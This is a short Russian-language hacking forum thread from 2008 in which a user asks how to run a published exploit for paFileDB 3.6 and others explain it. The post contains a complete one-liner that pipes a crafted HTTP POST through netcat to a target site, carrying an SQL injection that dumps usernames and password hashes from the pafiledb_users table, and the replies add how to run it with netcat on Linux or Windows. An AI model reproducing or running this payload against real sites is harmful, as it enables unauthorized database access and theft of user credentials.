помогите с эксплойтом

Discussion in 'Песочница' started by geforse, 14 Dec 2008.

  1. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    на милворме есть сплойт для paFileDB 3.6
    Я не пойму как с ним работать( вот это что за код ? o_0
    На чём написан ? Может нужно сохранить как .bat и запустить ?

    Code:
    host="www.example.com"; echo -e "POST 
    http://$host/index.php?act=search&process HTTP/1.1\nHost: $host\nContent-Length: 
    302\n\nquery=test&search_in[]=file_name&  search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1) 
    UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users"| netcat $host 80 
     
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    попробуй отправить это как header с помощью inetcrack
     
  3. +BemepoK+

    +BemepoK+ Member

    Joined:
    6 Dec 2008
    Messages:
    27
    Likes Received:
    11
    Reputations:
    -2
    Эксплоит шлёт пакет при помощи утилиты netcat с линуксовой тачки. Существует версия netcat для Win32, поэтому всё то же самое (с небольшими отличиями) можно повторить и под Windows.

    Линуксовый netcat льём с официального сайта:

    http://netcat.sourceforge.net/download.php

    Виндовый отсюда:

    http://jesterpm.net/downloads.php
     
    3 people like this.
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    _________________________
    #4 censored!, 16 Jan 2009
    Last edited: 17 Jan 2009